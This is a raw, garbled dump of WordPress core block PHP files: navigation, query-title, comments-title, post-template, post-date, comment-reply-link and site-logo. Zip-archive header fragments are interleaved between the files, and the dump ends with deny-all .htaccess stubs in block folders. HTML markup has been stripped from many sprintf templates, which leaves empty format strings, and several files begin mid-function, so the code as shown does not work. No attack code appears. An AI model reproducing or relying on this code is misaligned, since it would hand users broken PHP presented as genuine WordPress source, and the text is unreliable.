`wp_navigation` Post (via `ref`). // ...then create inner blocks from the classic menu assigned to that location. if ( defined( 'IS_GUTENBERG_PLUGIN' ) && IS_GUTENBERG_PLUGIN && array_key_exists( '__unstableLocation', $attributes ) && ! array_key_exists( 'ref', $attributes ) && ! empty( block_core_navigation_get_menu_items_at_location( $attributes['__unstableLocation'] ) ) ) { $menu_items = block_core_navigation_get_menu_items_at_location( $attributes['__unstableLocation'] ); if ( empty( $menu_items ) ) { return ''; } $menu_items_by_parent_id = block_core_navigation_sort_menu_items_by_parent_id( $menu_items ); $parsed_blocks = block_core_navigation_parse_blocks_from_menu_items( $menu_items_by_parent_id[0], $menu_items_by_parent_id ); $inner_blocks = new WP_Block_List( $parsed_blocks, $attributes ); } // Load inner blocks from the navigation post. if ( array_key_exists( 'ref', $attributes ) ) { $navigation_post = get_post( $attributes['ref'] ); if ( ! isset( $navigation_post ) ) { return ''; } // Only published posts are valid. If this is changed then a corresponding change // must also be implemented in `use-navigation-menu.js`. if ( 'publish' === $navigation_post->post_status ) { $nav_menu_name = $navigation_post->post_title; if ( isset( $seen_menu_names[ $nav_menu_name ] ) ) { ++$seen_menu_names[ $nav_menu_name ]; } else { $seen_menu_names[ $nav_menu_name ] = 1; } $parsed_blocks = parse_blocks( $navigation_post->post_content ); // 'parse_blocks' includes a null block with '\n\n' as the content when // it encounters whitespace. This code strips it. $compacted_blocks = block_core_navigation_filter_out_empty_blocks( $parsed_blocks ); // TODO - this uses the full navigation block attributes for the // context which could be refined. $inner_blocks = new WP_Block_List( $compacted_blocks, $attributes ); } } // If there are no inner blocks then fallback to rendering an appropriate fallback. if ( empty( $inner_blocks ) ) { $is_fallback = true; // indicate we are rendering the fallback. $fallback_blocks = block_core_navigation_get_fallback_blocks(); // Fallback my have been filtered so do basic test for validity. if ( empty( $fallback_blocks ) || ! is_array( $fallback_blocks ) ) { return ''; } $inner_blocks = new WP_Block_List( $fallback_blocks, $attributes ); } if ( block_core_navigation_block_contains_core_navigation( $inner_blocks ) ) { return ''; } /** * Filter navigation block $inner_blocks. * Allows modification of a navigation block menu items. * * @since 6.1.0 * * @param \WP_Block_List $inner_blocks */ $inner_blocks = apply_filters( 'block_core_navigation_render_inner_blocks', $inner_blocks ); $layout_justification = array( 'left' => 'items-justified-left', 'right' => 'items-justified-right', 'center' => 'items-justified-center', 'space-between' => 'items-justified-space-between', ); // Restore legacy classnames for submenu positioning. $layout_class = ''; if ( isset( $attributes['layout']['justifyContent'] ) && isset( $layout_justification[ $attributes['layout']['justifyContent'] ] ) ) { $layout_class .= $layout_justification[ $attributes['layout']['justifyContent'] ]; } if ( isset( $attributes['layout']['orientation'] ) && 'vertical' === $attributes['layout']['orientation'] ) { $layout_class .= ' is-vertical'; } if ( isset( $attributes['layout']['flexWrap'] ) && 'nowrap' === $attributes['layout']['flexWrap'] ) { $layout_class .= ' no-wrap'; } // Manually add block support text decoration as CSS class. $text_decoration = $attributes['style']['typography']['textDecoration'] ?? null; $text_decoration_class = sprintf( 'has-text-decoration-%s', $text_decoration ); $colors = block_core_navigation_build_css_colors( $attributes ); $font_sizes = block_core_navigation_build_css_font_sizes( $attributes ); $classes = array_merge( $colors['css_classes'], $font_sizes['css_classes'], $is_responsive_menu ? array( 'is-responsive' ) : array(), $layout_class ? array( $layout_class ) : array(), $is_fallback ? array( 'is-fallback' ) : array(), $text_decoration ? array( $text_decoration_class ) : array() ); $post_ids = block_core_navigation_get_post_ids( $inner_blocks ); if ( $post_ids ) { _prime_post_caches( $post_ids, false, false ); } $list_item_nav_blocks = array( 'core/navigation-link', 'core/home-link', 'core/site-title', 'core/site-logo', 'core/navigation-submenu', ); $needs_list_item_wrapper = array( 'core/site-title', 'core/site-logo', ); $block_styles = isset( $attributes['styles'] ) ? $attributes['styles'] : ''; $style = $block_styles . $colors['inline_styles'] . $font_sizes['inline_styles']; $class = implode( ' ', $classes ); // If the menu name has been used previously then append an ID // to the name to ensure uniqueness across a given post. if ( isset( $seen_menu_names[ $nav_menu_name ] ) && $seen_menu_names[ $nav_menu_name ] > 1 ) { $count = $seen_menu_names[ $nav_menu_name ]; $nav_menu_name = $nav_menu_name . ' ' . ( $count ); } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $class, 'style' => $style, 'aria-label' => $nav_menu_name, ) ); $container_attributes = get_block_wrapper_attributes( array( 'class' => 'wp-block-navigation__container ' . $class, 'style' => $style, ) ); $inner_blocks_html = ''; $is_list_open = false; $has_submenus = false; foreach ( $inner_blocks as $inner_block ) { $is_list_item = in_array( $inner_block->name, $list_item_nav_blocks, true ); if ( $is_list_item && ! $is_list_open ) { $is_list_open = true; $inner_blocks_html .= sprintf( '
        ', $container_attributes ); } if ( ! $is_list_item && $is_list_open ) { $is_list_open = false; $inner_blocks_html .= '
      '; } $inner_block_content = $inner_block->render(); $p = new WP_HTML_Tag_Processor( $inner_block_content ); if ( $p->next_tag( array( 'name' => 'LI', 'class_name' => 'has-child', ) ) ) { $has_submenus = true; } if ( ! empty( $inner_block_content ) ) { if ( in_array( $inner_block->name, $needs_list_item_wrapper, true ) ) { $inner_blocks_html .= '
    12. ' . $inner_block_content . '
    13. '; } else { $inner_blocks_html .= $inner_block_content; } } } if ( $is_list_open ) { $inner_blocks_html .= ''; } $should_load_view_script = ( $has_submenus && ( $attributes['openSubmenusOnClick'] || $attributes['showSubmenuIcon'] ) ) || $is_responsive_menu; $view_js_file = 'wp-block-navigation-view'; // If the script already exists, there is no point in removing it from viewScript. if ( ! wp_script_is( $view_js_file ) ) { $script_handles = $block->block_type->view_script_handles; // If the script is not needed, and it is still in the `view_script_handles`, remove it. if ( ! $should_load_view_script && in_array( $view_js_file, $script_handles, true ) ) { $block->block_type->view_script_handles = array_diff( $script_handles, array( $view_js_file ) ); } // If the script is needed, but it was previously removed, add it again. if ( $should_load_view_script && ! in_array( $view_js_file, $script_handles, true ) ) { $block->block_type->view_script_handles = array_merge( $script_handles, array( $view_js_file ) ); } } // Add directives to the submenu if needed. if ( $has_submenus && $should_load_view_script ) { $w = new WP_HTML_Tag_Processor( $inner_blocks_html ); $inner_blocks_html = block_core_navigation_add_directives_to_submenu( $w, $attributes ); } $modal_unique_id = wp_unique_id( 'modal-' ); // Determine whether or not navigation elements should be wrapped in the markup required to make it responsive, // return early if they don't. if ( ! $is_responsive_menu ) { return sprintf( '', $wrapper_attributes, $inner_blocks_html ); } $is_hidden_by_default = isset( $attributes['overlayMenu'] ) && 'always' === $attributes['overlayMenu']; $responsive_container_classes = array( 'wp-block-navigation__responsive-container', $is_hidden_by_default ? 'hidden-by-default' : '', implode( ' ', $colors['overlay_css_classes'] ), ); $open_button_classes = array( 'wp-block-navigation__responsive-container-open', $is_hidden_by_default ? 'always-shown' : '', ); $should_display_icon_label = isset( $attributes['hasIcon'] ) && true === $attributes['hasIcon']; $toggle_button_icon = ''; if ( isset( $attributes['icon'] ) ) { if ( 'menu' === $attributes['icon'] ) { $toggle_button_icon = ''; } } $toggle_button_content = $should_display_icon_label ? $toggle_button_icon : __( 'Menu' ); $toggle_close_button_icon = ''; $toggle_close_button_content = $should_display_icon_label ? $toggle_close_button_icon : __( 'Close' ); $toggle_aria_label_open = $should_display_icon_label ? 'aria-label="' . __( 'Open menu' ) . '"' : ''; // Open button label. $toggle_aria_label_close = $should_display_icon_label ? 'aria-label="' . __( 'Close menu' ) . '"' : ''; // Close button label. // Add Interactivity API directives to the markup if needed. $nav_element_directives = ''; $open_button_directives = ''; $responsive_container_directives = ''; $responsive_dialog_directives = ''; $close_button_directives = ''; if ( $should_load_view_script ) { $nav_element_context = wp_json_encode( array( 'core' => array( 'navigation' => array( 'overlayOpenedBy' => array(), 'type' => 'overlay', 'roleAttribute' => '', 'ariaLabel' => __( 'Menu' ), ), ), ), JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_AMP ); $nav_element_directives = ' data-wp-interactive data-wp-context=\'' . $nav_element_context . '\' '; $open_button_directives = ' data-wp-on--click="actions.core.navigation.openMenuOnClick" data-wp-on--keydown="actions.core.navigation.handleMenuKeydown" '; $responsive_container_directives = ' data-wp-class--has-modal-open="selectors.core.navigation.isMenuOpen" data-wp-class--is-menu-open="selectors.core.navigation.isMenuOpen" data-wp-effect="effects.core.navigation.initMenu" data-wp-on--keydown="actions.core.navigation.handleMenuKeydown" data-wp-on--focusout="actions.core.navigation.handleMenuFocusout" tabindex="-1" '; $responsive_dialog_directives = ' data-wp-bind--aria-modal="selectors.core.navigation.ariaModal" data-wp-bind--aria-label="selectors.core.navigation.ariaLabel" data-wp-bind--role="selectors.core.navigation.roleAttribute" data-wp-effect="effects.core.navigation.focusFirstElement" '; $close_button_directives = ' data-wp-on--click="actions.core.navigation.closeMenuOnClick" '; } $responsive_container_markup = sprintf( '
      %2$s
      ', esc_attr( $modal_unique_id ), $inner_blocks_html, $toggle_aria_label_open, $toggle_aria_label_close, esc_attr( implode( ' ', $responsive_container_classes ) ), esc_attr( implode( ' ', $open_button_classes ) ), esc_attr( safecss_filter_attr( $colors['overlay_inline_styles'] ) ), $toggle_button_content, $toggle_close_button_content, $open_button_directives, $responsive_container_directives, $responsive_dialog_directives, $close_button_directives ); return sprintf( '', $wrapper_attributes, $responsive_container_markup, $nav_element_directives ); } /** * Register the navigation block. * * @uses render_block_core_navigation() * @throws WP_Error An WP_Error exception parsing the block definition. */ function register_block_core_navigation() { register_block_type_from_metadata( __DIR__ . '/navigation', array( 'render_callback' => 'render_block_core_navigation', ) ); } add_action( 'init', 'register_block_core_navigation' ); /** * Filter that changes the parsed attribute values of navigation blocks contain typographic presets to contain the values directly. * * @param array $parsed_block The block being rendered. * * @return array The block being rendered without typographic presets. */ function block_core_navigation_typographic_presets_backcompatibility( $parsed_block ) { if ( 'core/navigation' === $parsed_block['blockName'] ) { $attribute_to_prefix_map = array( 'fontStyle' => 'var:preset|font-style|', 'fontWeight' => 'var:preset|font-weight|', 'textDecoration' => 'var:preset|text-decoration|', 'textTransform' => 'var:preset|text-transform|', ); foreach ( $attribute_to_prefix_map as $style_attribute => $prefix ) { if ( ! empty( $parsed_block['attrs']['style']['typography'][ $style_attribute ] ) ) { $prefix_len = strlen( $prefix ); $attribute_value = &$parsed_block['attrs']['style']['typography'][ $style_attribute ]; if ( 0 === strncmp( $attribute_value, $prefix, $prefix_len ) ) { $attribute_value = substr( $attribute_value, $prefix_len ); } if ( 'textDecoration' === $style_attribute && 'strikethrough' === $attribute_value ) { $attribute_value = 'line-through'; } } } } return $parsed_block; } add_filter( 'render_block_data', 'block_core_navigation_typographic_presets_backcompatibility' ); /** * Ensure that the view script has the `wp-interactivity` dependency. * * @since 6.4.0 * * @global WP_Scripts $wp_scripts */ function block_core_navigation_ensure_interactivity_dependency() { global $wp_scripts; if ( isset( $wp_scripts->registered['wp-block-navigation-view'] ) && ! in_array( 'wp-interactivity', $wp_scripts->registered['wp-block-navigation-view']->deps, true ) ) { $wp_scripts->registered['wp-block-navigation-view']->deps[] = 'wp-interactivity'; } } add_action( 'wp_print_scripts', 'block_core_navigation_ensure_interactivity_dependency' ); /** * Turns menu item data into a nested array of parsed blocks * * @deprecated 6.3.0 Use WP_Navigation_Fallback::parse_blocks_from_menu_items() instead. * * @param array $menu_items An array of menu items that represent * an individual level of a menu. * @param array $menu_items_by_parent_id An array keyed by the id of the * parent menu where each element is an * array of menu items that belong to * that parent. * @return array An array of parsed block data. */ function block_core_navigation_parse_blocks_from_menu_items( $menu_items, $menu_items_by_parent_id ) { _deprecated_function( __FUNCTION__, '6.3.0', 'WP_Navigation_Fallback::parse_blocks_from_menu_items' ); if ( empty( $menu_items ) ) { return array(); } $blocks = array(); foreach ( $menu_items as $menu_item ) { $class_name = ! empty( $menu_item->classes ) ? implode( ' ', (array) $menu_item->classes ) : null; $id = ( null !== $menu_item->object_id && 'custom' !== $menu_item->object ) ? $menu_item->object_id : null; $opens_in_new_tab = null !== $menu_item->target && '_blank' === $menu_item->target; $rel = ( null !== $menu_item->xfn && '' !== $menu_item->xfn ) ? $menu_item->xfn : null; $kind = null !== $menu_item->type ? str_replace( '_', '-', $menu_item->type ) : 'custom'; $block = array( 'blockName' => isset( $menu_items_by_parent_id[ $menu_item->ID ] ) ? 'core/navigation-submenu' : 'core/navigation-link', 'attrs' => array( 'className' => $class_name, 'description' => $menu_item->description, 'id' => $id, 'kind' => $kind, 'label' => $menu_item->title, 'opensInNewTab' => $opens_in_new_tab, 'rel' => $rel, 'title' => $menu_item->attr_title, 'type' => $menu_item->object, 'url' => $menu_item->url, ), ); $block['innerBlocks'] = isset( $menu_items_by_parent_id[ $menu_item->ID ] ) ? block_core_navigation_parse_blocks_from_menu_items( $menu_items_by_parent_id[ $menu_item->ID ], $menu_items_by_parent_id ) : array(); $block['innerContent'] = array_map( 'serialize_block', $block['innerBlocks'] ); $blocks[] = $block; } return $blocks; } /** * Get the classic navigation menu to use as a fallback. * * @deprecated 6.3.0 Use WP_Navigation_Fallback::get_classic_menu_fallback() instead. * * @return object WP_Term The classic navigation. */ function block_core_navigation_get_classic_menu_fallback() { _deprecated_function( __FUNCTION__, '6.3.0', 'WP_Navigation_Fallback::get_classic_menu_fallback' ); $classic_nav_menus = wp_get_nav_menus(); // If menus exist. if ( $classic_nav_menus && ! is_wp_error( $classic_nav_menus ) ) { // Handles simple use case where user has a classic menu and switches to a block theme. // Returns the menu assigned to location `primary`. $locations = get_nav_menu_locations(); if ( isset( $locations['primary'] ) ) { $primary_menu = wp_get_nav_menu_object( $locations['primary'] ); if ( $primary_menu ) { return $primary_menu; } } // Returns a menu if `primary` is its slug. foreach ( $classic_nav_menus as $classic_nav_menu ) { if ( 'primary' === $classic_nav_menu->slug ) { return $classic_nav_menu; } } // Otherwise return the most recently created classic menu. usort( $classic_nav_menus, static function ( $a, $b ) { return $b->term_id - $a->term_id; } ); return $classic_nav_menus[0]; } } /** * Converts a classic navigation to blocks. * * @deprecated 6.3.0 Use WP_Navigation_Fallback::get_classic_menu_fallback_blocks() instead. * * @param object $classic_nav_menu WP_Term The classic navigation object to convert. * @return array the normalized parsed blocks. */ function block_core_navigation_get_classic_menu_fallback_blocks( $classic_nav_menu ) { _deprecated_function( __FUNCTION__, '6.3.0', 'WP_Navigation_Fallback::get_classic_menu_fallback_blocks' ); // BEGIN: Code that already exists in wp_nav_menu(). $menu_items = wp_get_nav_menu_items( $classic_nav_menu->term_id, array( 'update_post_term_cache' => false ) ); // Set up the $menu_item variables. _wp_menu_item_classes_by_context( $menu_items ); $sorted_menu_items = array(); foreach ( (array) $menu_items as $menu_item ) { $sorted_menu_items[ $menu_item->menu_order ] = $menu_item; } unset( $menu_items, $menu_item ); // END: Code that already exists in wp_nav_menu(). $menu_items_by_parent_id = array(); foreach ( $sorted_menu_items as $menu_item ) { $menu_items_by_parent_id[ $menu_item->menu_item_parent ][] = $menu_item; } $inner_blocks = block_core_navigation_parse_blocks_from_menu_items( isset( $menu_items_by_parent_id[0] ) ? $menu_items_by_parent_id[0] : array(), $menu_items_by_parent_id ); return serialize_blocks( $inner_blocks ); } /** * If there's a classic menu then use it as a fallback. * * @deprecated 6.3.0 Use WP_Navigation_Fallback::create_classic_menu_fallback() instead. * * @return array the normalized parsed blocks. */ function block_core_navigation_maybe_use_classic_menu_fallback() { _deprecated_function( __FUNCTION__, '6.3.0', 'WP_Navigation_Fallback::create_classic_menu_fallback' ); // See if we have a classic menu. $classic_nav_menu = block_core_navigation_get_classic_menu_fallback(); if ( ! $classic_nav_menu ) { return; } // If we have a classic menu then convert it to blocks. $classic_nav_menu_blocks = block_core_navigation_get_classic_menu_fallback_blocks( $classic_nav_menu ); if ( empty( $classic_nav_menu_blocks ) ) { return; } // Create a new navigation menu from the classic menu. $wp_insert_post_result = wp_insert_post( array( 'post_content' => $classic_nav_menu_blocks, 'post_title' => $classic_nav_menu->name, 'post_name' => $classic_nav_menu->slug, 'post_status' => 'publish', 'post_type' => 'wp_navigation', ), true // So that we can check whether the result is an error. ); if ( is_wp_error( $wp_insert_post_result ) ) { return; } // Fetch the most recently published navigation which will be the classic one created above. return block_core_navigation_get_most_recently_published_navigation(); } /** * Finds the most recently published `wp_navigation` Post. * * @deprecated 6.3.0 Use WP_Navigation_Fallback::get_most_recently_published_navigation() instead. * * @return WP_Post|null the first non-empty Navigation or null. */ function block_core_navigation_get_most_recently_published_navigation() { _deprecated_function( __FUNCTION__, '6.3.0', 'WP_Navigation_Fallback::get_most_recently_published_navigation' ); // Default to the most recently created menu. $parsed_args = array( 'post_type' => 'wp_navigation', 'no_found_rows' => true, 'update_post_meta_cache' => false, 'update_post_term_cache' => false, 'order' => 'DESC', 'orderby' => 'date', 'post_status' => 'publish', 'posts_per_page' => 1, // get only the most recent. ); $navigation_post = new WP_Query( $parsed_args ); if ( count( $navigation_post->posts ) > 0 ) { return $navigation_post->posts[0]; } return null; } PK7[ù  query-title.phpnu[ $align_class_name ) ); return sprintf( '<%1$s %2$s>%3$s', $tag_name, $wrapper_attributes, $title ); } /** * Registers the `core/query-title` block on the server. */ function register_block_core_query_title() { register_block_type_from_metadata( __DIR__ . '/query-title', array( 'render_callback' => 'render_block_core_query_title', ) ); } add_action( 'init', 'register_block_core_query_title' ); PK7[|B comments-title.phpnu[ $align_class_name ) ); $comments_count = get_comments_number(); /* translators: %s: Post title. */ $post_title = sprintf( __( '“%s”' ), get_the_title() ); $tag_name = 'h2'; if ( isset( $attributes['level'] ) ) { $tag_name = 'h' . $attributes['level']; } if ( '0' === $comments_count ) { return; } if ( $show_comments_count ) { if ( $show_post_title ) { if ( '1' === $comments_count ) { /* translators: %s: Post title. */ $comments_title = sprintf( __( 'One response to %s' ), $post_title ); } else { $comments_title = sprintf( /* translators: 1: Number of comments, 2: Post title. */ _n( '%1$s response to %2$s', '%1$s responses to %2$s', $comments_count ), number_format_i18n( $comments_count ), $post_title ); } } elseif ( '1' === $comments_count ) { $comments_title = __( 'One response' ); } else { $comments_title = sprintf( /* translators: %s: Number of comments. */ _n( '%s response', '%s responses', $comments_count ), number_format_i18n( $comments_count ) ); } } elseif ( $show_post_title ) { if ( '1' === $comments_count ) { /* translators: %s: Post title. */ $comments_title = sprintf( __( 'Response to %s' ), $post_title ); } else { /* translators: %s: Post title. */ $comments_title = sprintf( __( 'Responses to %s' ), $post_title ); } } elseif ( '1' === $comments_count ) { $comments_title = __( 'Response' ); } else { $comments_title = __( 'Responses' ); } return sprintf( '<%1$s id="comments" %2$s>%3$s', $tag_name, $wrapper_attributes, $comments_title ); } /** * Registers the `core/comments-title` block on the server. */ function register_block_core_comments_title() { register_block_type_from_metadata( __DIR__ . '/comments-title', array( 'render_callback' => 'render_block_core_comments_title', ) ); } add_action( 'init', 'register_block_core_comments_title' ); PK7[&EBrrquery-pagination.phpnu[ __( 'Pagination' ), 'class' => $classes, ) ); return sprintf( '', $wrapper_attributes, $content ); } /** * Registers the `core/query-pagination` block on the server. */ function register_block_core_query_pagination() { register_block_type_from_metadata( __DIR__ . '/query-pagination', array( 'render_callback' => 'render_block_core_query_pagination', ) ); } add_action( 'init', 'register_block_core_query_pagination' ); PK7[:Epost-template.phpnu[name ) { return true; } if ( 'core/cover' === $block->name && ! empty( $block->attributes['useFeaturedImage'] ) ) { return true; } if ( $block->inner_blocks && block_core_post_template_uses_featured_image( $block->inner_blocks ) ) { return true; } } return false; } /** * Renders the `core/post-template` block on the server. * * @since 6.3.0 Changed render_block_context priority to `1`. * * @param array $attributes Block attributes. * @param string $content Block default content. * @param WP_Block $block Block instance. * * @return string Returns the output of the query, structured using the layout defined by the block's inner blocks. */ function render_block_core_post_template( $attributes, $content, $block ) { $page_key = isset( $block->context['queryId'] ) ? 'query-' . $block->context['queryId'] . '-page' : 'query-page'; $enhanced_pagination = isset( $block->context['enhancedPagination'] ) && $block->context['enhancedPagination']; $page = empty( $_GET[ $page_key ] ) ? 1 : (int) $_GET[ $page_key ]; // Use global query if needed. $use_global_query = ( isset( $block->context['query']['inherit'] ) && $block->context['query']['inherit'] ); if ( $use_global_query ) { global $wp_query; /* * If already in the main query loop, duplicate the query instance to not tamper with the main instance. * Since this is a nested query, it should start at the beginning, therefore rewind posts. * Otherwise, the main query loop has not started yet and this block is responsible for doing so. */ if ( in_the_loop() ) { $query = clone $wp_query; $query->rewind_posts(); } else { $query = $wp_query; } } else { $query_args = build_query_vars_from_query_block( $block, $page ); $query = new WP_Query( $query_args ); } if ( ! $query->have_posts() ) { return ''; } if ( block_core_post_template_uses_featured_image( $block->inner_blocks ) ) { update_post_thumbnail_cache( $query ); } $classnames = ''; if ( isset( $block->context['displayLayout'] ) && isset( $block->context['query'] ) ) { if ( isset( $block->context['displayLayout']['type'] ) && 'flex' === $block->context['displayLayout']['type'] ) { $classnames = "is-flex-container columns-{$block->context['displayLayout']['columns']}"; } } if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) { $classnames .= ' has-link-color'; } // Ensure backwards compatibility by flagging the number of columns via classname when using grid layout. if ( isset( $attributes['layout']['type'] ) && 'grid' === $attributes['layout']['type'] && ! empty( $attributes['layout']['columnCount'] ) ) { $classnames .= ' ' . sanitize_title( 'columns-' . $attributes['layout']['columnCount'] ); } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => trim( $classnames ) ) ); $content = ''; while ( $query->have_posts() ) { $query->the_post(); // Get an instance of the current Post Template block. $block_instance = $block->parsed_block; // Set the block name to one that does not correspond to an existing registered block. // This ensures that for the inner instances of the Post Template block, we do not render any block supports. $block_instance['blockName'] = 'core/null'; $post_id = get_the_ID(); $post_type = get_post_type(); $filter_block_context = static function ( $context ) use ( $post_id, $post_type ) { $context['postType'] = $post_type; $context['postId'] = $post_id; return $context; }; // Use an early priority to so that other 'render_block_context' filters have access to the values. add_filter( 'render_block_context', $filter_block_context, 1 ); // Render the inner blocks of the Post Template block with `dynamic` set to `false` to prevent calling // `render_callback` and ensure that no wrapper markup is included. $block_content = ( new WP_Block( $block_instance ) )->render( array( 'dynamic' => false ) ); remove_filter( 'render_block_context', $filter_block_context, 1 ); // Wrap the render inner blocks in a `li` element with the appropriate post classes. $post_classes = implode( ' ', get_post_class( 'wp-block-post' ) ); $inner_block_directives = $enhanced_pagination ? ' data-wp-key="post-template-item-' . $post_id . '"' : ''; $content .= '' . $block_content . ''; } /* * Use this function to restore the context of the template tags * from a secondary query loop back to the main query loop. * Since we use two custom loops, it's safest to always restore. */ wp_reset_postdata(); return sprintf( '
        %2$s
      ', $wrapper_attributes, $content ); } /** * Registers the `core/post-template` block on the server. */ function register_block_core_post_template() { register_block_type_from_metadata( __DIR__ . '/post-template', array( 'render_callback' => 'render_block_core_post_template', 'skip_inner_blocks' => true, ) ); } add_action( 'init', 'register_block_core_post_template' ); PK7[f( ( post-date.phpnu[context['postId'] ) ) { return ''; } $post_ID = $block->context['postId']; $formatted_date = get_the_date( empty( $attributes['format'] ) ? '' : $attributes['format'], $post_ID ); $unformatted_date = esc_attr( get_the_date( 'c', $post_ID ) ); $classes = array(); if ( isset( $attributes['textAlign'] ) ) { $classes[] = 'has-text-align-' . $attributes['textAlign']; } if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) { $classes[] = 'has-link-color'; } /* * If the "Display last modified date" setting is enabled, * only display the modified date if it is later than the publishing date. */ if ( isset( $attributes['displayType'] ) && 'modified' === $attributes['displayType'] ) { if ( get_the_modified_date( 'Ymdhi', $post_ID ) > get_the_date( 'Ymdhi', $post_ID ) ) { $formatted_date = get_the_modified_date( empty( $attributes['format'] ) ? '' : $attributes['format'], $post_ID ); $unformatted_date = esc_attr( get_the_modified_date( 'c', $post_ID ) ); $classes[] = 'wp-block-post-date__modified-date'; } else { return ''; } } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) ); if ( isset( $attributes['isLink'] ) && $attributes['isLink'] ) { $formatted_date = sprintf( '%2s', get_the_permalink( $post_ID ), $formatted_date ); } return sprintf( '
      ', $wrapper_attributes, $unformatted_date, $formatted_date ); } /** * Registers the `core/post-date` block on the server. */ function register_block_core_post_date() { register_block_type_from_metadata( __DIR__ . '/post-date', array( 'render_callback' => 'render_block_core_post_date', ) ); } add_action( 'init', 'register_block_core_post_date' ); PK7[Ecomment-reply-link.phpnu[context['commentId'] ) ) { return ''; } $thread_comments = get_option( 'thread_comments' ); if ( ! $thread_comments ) { return ''; } $comment = get_comment( $block->context['commentId'] ); if ( empty( $comment ) ) { return ''; } $depth = 1; $max_depth = get_option( 'thread_comments_depth' ); $parent_id = $comment->comment_parent; // Compute comment's depth iterating over its ancestors. while ( ! empty( $parent_id ) ) { ++$depth; $parent_id = get_comment( $parent_id )->comment_parent; } $comment_reply_link = get_comment_reply_link( array( 'depth' => $depth, 'max_depth' => $max_depth, ), $comment ); // Render nothing if the generated reply link is empty. if ( empty( $comment_reply_link ) ) { return; } $classes = array(); if ( isset( $attributes['textAlign'] ) ) { $classes[] = 'has-text-align-' . $attributes['textAlign']; } if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) { $classes[] = 'has-link-color'; } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) ); return sprintf( '
      %2$s
      ', $wrapper_attributes, $comment_reply_link ); } /** * Registers the `core/comment-reply-link` block on the server. */ function register_block_core_comment_reply_link() { register_block_type_from_metadata( __DIR__ . '/comment-reply-link', array( 'render_callback' => 'render_block_core_comment_reply_link', ) ); } add_action( 'init', 'register_block_core_comment_reply_link' ); PK7[+-- site-logo.phpnu[(.*?)#i', '\1', $custom_logo ); } if ( $attributes['isLink'] && '_blank' === $attributes['linkTarget'] ) { // Add the link target after the rel="home". // Add an aria-label for informing that the page opens in a new tab. $processor = new WP_HTML_Tag_Processor( $custom_logo ); $processor->next_tag( 'a' ); if ( 'home' === $processor->get_attribute( 'rel' ) ) { $processor->set_attribute( 'aria-label', __( '(Home link, opens in a new tab)' ) ); $processor->set_attribute( 'target', $attributes['linkTarget'] ); } $custom_logo = $processor->get_updated_html(); } $classnames = array(); if ( empty( $attributes['width'] ) ) { $classnames[] = 'is-default-size'; } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classnames ) ) ); $html = sprintf( '
      %s
      ', $wrapper_attributes, $custom_logo ); return $html; } /** * Register a core site setting for a site logo */ function register_block_core_site_logo_setting() { register_setting( 'general', 'site_logo', array( 'show_in_rest' => array( 'name' => 'site_logo', ), 'type' => 'integer', 'description' => __( 'Site logo.' ), ) ); } add_action( 'rest_api_init', 'register_block_core_site_logo_setting', 10 ); /** * Register a core site setting for a site icon */ function register_block_core_site_icon_setting() { register_setting( 'general', 'site_icon', array( 'show_in_rest' => true, 'type' => 'integer', 'description' => __( 'Site icon.' ), ) ); } add_action( 'rest_api_init', 'register_block_core_site_icon_setting', 10 ); /** * Registers the `core/site-logo` block on the server. */ function register_block_core_site_logo() { register_block_type_from_metadata( __DIR__ . '/site-logo', array( 'render_callback' => 'render_block_core_site_logo', ) ); } add_action( 'init', 'register_block_core_site_logo' ); /** * Overrides the custom logo with a site logo, if the option is set. * * @param string $custom_logo The custom logo set by a theme. * * @return string The site logo if set. */ function _override_custom_logo_theme_mod( $custom_logo ) { $site_logo = get_option( 'site_logo' ); return false === $site_logo ? $custom_logo : $site_logo; } add_filter( 'theme_mod_custom_logo', '_override_custom_logo_theme_mod' ); /** * Updates the site_logo option when the custom_logo theme-mod gets updated. * * @param mixed $value Attachment ID of the custom logo or an empty value. * @return mixed */ function _sync_custom_logo_to_site_logo( $value ) { if ( empty( $value ) ) { delete_option( 'site_logo' ); } else { update_option( 'site_logo', $value ); } return $value; } add_filter( 'pre_set_theme_mod_custom_logo', '_sync_custom_logo_to_site_logo' ); /** * Deletes the site_logo when the custom_logo theme mod is removed. * * @param array $old_value Previous theme mod settings. * @param array $value Updated theme mod settings. */ function _delete_site_logo_on_remove_custom_logo( $old_value, $value ) { global $_ignore_site_logo_changes; if ( $_ignore_site_logo_changes ) { return; } // If the custom_logo is being unset, it's being removed from theme mods. if ( isset( $old_value['custom_logo'] ) && ! isset( $value['custom_logo'] ) ) { delete_option( 'site_logo' ); } } /** * Deletes the site logo when all theme mods are being removed. */ function _delete_site_logo_on_remove_theme_mods() { global $_ignore_site_logo_changes; if ( $_ignore_site_logo_changes ) { return; } if ( false !== get_theme_support( 'custom-logo' ) ) { delete_option( 'site_logo' ); } } /** * Hooks `_delete_site_logo_on_remove_custom_logo` in `update_option_theme_mods_$theme`. * Hooks `_delete_site_logo_on_remove_theme_mods` in `delete_option_theme_mods_$theme`. * * Runs on `setup_theme` to account for dynamically-switched themes in the Customizer. */ function _delete_site_logo_on_remove_custom_logo_on_setup_theme() { $theme = get_option( 'stylesheet' ); add_action( "update_option_theme_mods_$theme", '_delete_site_logo_on_remove_custom_logo', 10, 2 ); add_action( "delete_option_theme_mods_$theme", '_delete_site_logo_on_remove_theme_mods' ); } add_action( 'setup_theme', '_delete_site_logo_on_remove_custom_logo_on_setup_theme', 11 ); /** * Removes the custom_logo theme-mod when the site_logo option gets deleted. */ function _delete_custom_logo_on_remove_site_logo() { global $_ignore_site_logo_changes; // Prevent _delete_site_logo_on_remove_custom_logo and // _delete_site_logo_on_remove_theme_mods from firing and causing an // infinite loop. $_ignore_site_logo_changes = true; // Remove the custom logo. remove_theme_mod( 'custom_logo' ); $_ignore_site_logo_changes = false; } add_action( 'delete_option_site_logo', '_delete_custom_logo_on_remove_site_logo' ); PK[ydccshortcode/.htaccessnu6$ Order Allow,Deny Deny from all PK[ydccsocial-link/.htaccessnu6$ Order Allow,Deny Deny from all PK[ydccarchives/.htaccessnu6$ Order Allow,Deny Deny from all PK[ydccaudio/.htaccessnu6$ Order Allow,Deny Deny from all 